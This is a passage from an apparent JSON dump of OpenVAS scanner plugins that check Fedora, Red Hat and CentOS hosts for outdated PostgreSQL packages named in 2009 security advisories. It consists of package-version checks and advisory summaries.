at\nhttp://www.postgresql.org/docs/8.3/static/release-8-3-8.html\nincluding three security issues\nRelated: #522084\nRelated: #522085\nRelated: #522092\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update postgresql' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-9474\";\ntag_summary = \"The remote host is missing an update to postgresql\nannounced via advisory FEDORA-2009-9474.\";\n\n\n\nif(description)\n{\n script_id(64851);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-15 22:46:32 +0200 (Tue, 15 Sep 2009)\");\n script_cve_id(\"CVE-2009-0922\", \"CVE-2007-6600\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Core 10 FEDORA-2009-9474 (postgresql)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=522084\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=522085\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=522092\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-plperl\", rpm:\"postgresql-plperl~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-plpython\", rpm:\"postgresql-plpython~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-pltcl\", rpm:\"postgresql-pltcl~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-python\", rpm:\"postgresql-python~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-tcl\", rpm:\"postgresql-tcl~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-test\", rpm:\"postgresql-test~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-debuginfo\", rpm:\"postgresql-debuginfo~8.3.8~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-27T10:56:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6600", "CVE-2009-0922", "CVE-2009-3230"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1484.\n\nPostgreSQL is an advanced object-relational database management system\n(DBMS).\n\nIt was discovered that the upstream patch for CVE-2007-6600 included in the\nRed Hat Security Advisory RHSA-2008:0038 did not include protection against\nmisuse of the RESET ROLE and RESET SESSION AUTHORIZATION commands. An\nauthenticated user could use this flaw to install malicious code that would\nlater execute with superuser privileges. (CVE-2009-3230)\n\nA flaw was found in the way PostgreSQL handled encoding conversion. A\nremote, authenticated user could trigger an encoding conversion failure,\npossibly leading to a temporary denial of service. Note: To exploit this\nissue, a locale and client encoding for which specific messages fail to\ntranslate must be selected (the availability of these is determined by an\nadministrator-defined locale setting). (CVE-2009-0922)\n\nNote: For Red Hat Enterprise Linux 4, this update upgrades PostgreSQL to\nversion 7.4.26. For Red Hat Enterprise Linux 5, this update upgrades\nPostgreSQL to version 8.1.18. Refer to the PostgreSQL Release Notes for a\nlist of changes:\n\n\nAll PostgreSQL users should upgrade to these updated packages, which\nresolve these issues. If the postgresql service is running, it will be\nautomatically restarted after installing this update.", "modified": "2017-07-12T00:00:00", "published": "2009-10-13T00:00:00", "id": "OPENVAS:65729", "href": "http://plugins.openvas.org/nasl.php?oid=65729", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1484", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1484.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1484 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\n\nhttp://rhn.redhat.com/errata/RHSA-2009-1484.html\nhttp://www.redhat.com/security/updates/classification/#moderate\";\n\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1484.\n\nPostgreSQL is an advanced object-relational database management system\n(DBMS).\n\nIt was discovered that the upstream patch for CVE-2007-6600 included in the\nRed Hat Security Advisory RHSA-2008:0038 did not include protection against\nmisuse of the RESET ROLE and RESET SESSION AUTHORIZATION commands. An\nauthenticated user could use this flaw to install malicious code that would\nlater execute with superuser privileges. (CVE-2009-3230)\n\nA flaw was found in the way PostgreSQL handled encoding conversion. A\nremote, authenticated user could trigger an encoding conversion failure,\npossibly leading to a temporary denial of service. Note: To exploit this\nissue, a locale and client encoding for which specific messages fail to\ntranslate must be selected (the availability of these is determined by an\nadministrator-defined locale setting). (CVE-2009-0922)\n\nNote: For Red Hat Enterprise Linux 4, this update upgrades PostgreSQL to\nversion 7.4.26. For Red Hat Enterprise Linux 5, this update upgrades\nPostgreSQL to version 8.1.18. Refer to the PostgreSQL Release Notes for a\nlist of changes:\n\n\nAll PostgreSQL users should upgrade to these updated packages, which\nresolve these issues. If the postgresql service is running, it will be\nautomatically restarted after installing this update.\";\n\n\n\nif(description)\n{\n script_id(65729);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2009-0922\", \"CVE-2009-3230\", \"CVE-2007-6600\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"RedHat Security Advisory RHSA-2009:1484\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://www.postgresql.org/docs/7.4/static/release.html\");\n script_xref(name : \"URL\" , value : \"http://www.postgresql.org/docs/8.1/static/release.html\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~7.4.26~1.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~7.4.26~1.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-debuginfo\", rpm:\"postgresql-debuginfo~7.4.26~1.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~7.4.26~1.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~7.4.26~1.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-jdbc\", rpm:\"postgresql-jdbc~7.4.26~1.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~7.4.26~1.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-pl\", rpm:\"postgresql-pl~7.4.26~1.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-python\", rpm:\"postgresql-python~7.4.26~1.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~7.4.26~1.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-tcl\", rpm:\"postgresql-tcl~7.4.26~1.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-test\", rpm:\"postgresql-test~7.4.26~1.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~8.1.18~2.el5_4.1\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~8.1.18~2.el5_4.1\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-debuginfo\", rpm:\"postgresql-debuginfo~8.1.18~2.el5_4.1\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~8.1.18~2.el5_4.1\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~8.1.18~2.el5_4.1\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-python\", rpm:\"postgresql-python~8.1.18~2.el5_4.1\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-tcl\", rpm:\"postgresql-tcl~8.1.18~2.el5_4.1\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~8.1.18~2.el5_4.1\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-pl\", rpm:\"postgresql-pl~8.1.18~2.el5_4.1\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~8.1.18~2.el5_4.1\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-test\", rpm:\"postgresql-test~8.1.18~2.el5_4.1\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:40:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6600", "CVE-2009-0922", "CVE-2009-3230"], "description": "The remote host is missing updates to postgresql announced in\nadvisory CESA-2009:1484.", "modified": "2018-04-06T00:00:00", "published": "2009-10-13T00:00:00", "id": "OPENVAS:136141256231065757", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065757", "type": "openvas", "title": "CentOS Security Advisory CESA-2009:1484 (postgresql)", "sourceData": "#CESA-2009:1484 65757 4\n# $Id: ovcesa2009_1484.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory CESA-2009:1484 (postgresql)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed in this update,\nplease visit the referenced security advisories.\";\ntag_solution = \"Update the appropriate packages on your system.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=CESA-2009:1484\nhttp://www.securityspace.com/smysecure/catid.html?in=RHSA-2009:1484\nhttps://rhn.redhat.com/errata/RHSA-2009-1484.html\";\ntag_summary = \"The remote host is missing updates to postgresql announced in\nadvisory CESA-2009:1484.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65757\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2009-0922\", \"CVE-2009-3230\", \"CVE-2007-6600\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"CentOS Security Advisory CESA-2009:1484 (postgresql)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-debuginfo\", rpm:\"postgresql-debuginfo~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-jdbc\", rpm:\"postgresql-jdbc~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-pl\", rpm:\"postgresql-pl~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-python\", rpm:\"postgresql-python~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-tcl\", rpm:\"postgresql-tcl~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-test\", rpm:\"postgresql-test~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-pl\", rpm:\"postgresql-pl~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-python\", rpm:\"postgresql-python~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-tcl\", rpm:\"postgresql-tcl~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-test\", rpm:\"postgresql-test~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6600", "CVE-2009-0922", "CVE-2009-3230"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:1361412562310880695", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880695", "type": "openvas", "title": "CentOS Update for postgresql CESA-2009:1484 centos5 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for postgresql CESA-2009:1484 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.880695\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_xref(name:\"CESA\", value:\"2009:1484\");\n script_cve_id(\"CVE-2009-0922\", \"CVE-2009-3230\", \"CVE-2007-6600\");\n script_name(\"CentOS Update for postgresql CESA-2009:1484 centos5 i386\");\n\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2009-October/016272.html\");\n script_xref(name:\"URL\", value:\"http://www.postgresql.org/docs/7.4/static/release.html\");\n script_xref(name:\"URL\", value:\"http://www.postgresql.org/docs/8.1/static/release.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'postgresql'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"postgresql on CentOS 5\");\n script_tag(name:\"insight\", value:\"PostgreSQL is an advanced object-relational database management system\n (DBMS).\n\n It was discovered that the upstream patch for CVE-2007-6600 included in the\n Red Hat Security Advisory RHSA-2008:0038 did not include protection against\n misuse of the RESET ROLE and RESET SESSION AUTHORIZATION commands. An\n authenticated user could use this flaw to install malicious code that would\n later execute with superuser privileges. (CVE-2009-3230)\n\n A flaw was found in the way PostgreSQL handled encoding conversion. A\n remote, authenticated user could trigger an encoding conversion failure,\n possibly leading to a temporary denial of service. Note: To exploit this\n issue, a locale and client encoding for which specific messages fail to\n translate must be selected (the availability of these is determined by an\n administrator-defined locale setting). (CVE-2009-0922)\n\n Note: For Red Hat Enterprise Linux 4, this update upgrades PostgreSQL to\n version 7.4.26. For Red Hat Enterprise Linux 5, this update upgrades\n PostgreSQL to version 8.1.18. Refer to the linked PostgreSQL Release Notes for a\n list of changes.\n\n All PostgreSQL users should upgrade to these updated packages, which\n resolve these issues. If the postgresql service is running, it will be\n automatically restarted after installing this update.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-pl\", rpm:\"postgresql-pl~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-python\", rpm:\"postgresql-python~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-tcl\", rpm:\"postgresql-tcl~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-test\", rpm:\"postgresql-test~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2018-04-06T11:40:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6600", "CVE-2009-0922", "CVE-2009-3230"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1484.\n\nPostgreSQL is an advanced object-relational database management system\n(DBMS).\n\nIt was discovered that the upstream patch for CVE-2007-6600 included in the\nRed Hat Security Advisory RHSA-2008:0038 did not include protection against\nmisuse of the RESET ROLE and RESET SESSION AUTHORIZATION commands. An\nauthenticated user could use this flaw to install malicious code that would\nlater execute with superuser privileges. (CVE-2009-3230)\n\nA flaw was found in the way PostgreSQL handled encoding conversion. A\nremote, authenticated user could trigger an encoding conversion failure,\npossibly leading to a temporary denial of service. Note: To exploit this\nissue, a locale and client encoding for which specific messages fail to\ntranslate must be selected (the availability of these is determined by an\nadministrator-defined locale setting). (CVE-2009-0922)\n\nNote: For Red Hat Enterprise Linux 4, this update upgrades PostgreSQL to\nversion 7.4.26. For Red Hat Enterprise Linux 5, this update upgrades\nPostgreSQL to version 8.1.18. Refer to the PostgreSQL Release Notes for a\nlist of changes:\n\n\nAll PostgreSQL users should upgrade to these updated packages, which\nresolve these issues. If the postgresql service is running, it will be\nautomatically restarted after installing this update.", "modified": "2018-04-06T00:00:00", "published": "2009-10-13T00:00:00", "id": "OPENVAS:136141256231065729", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065729", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1484", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1484.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1484 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License 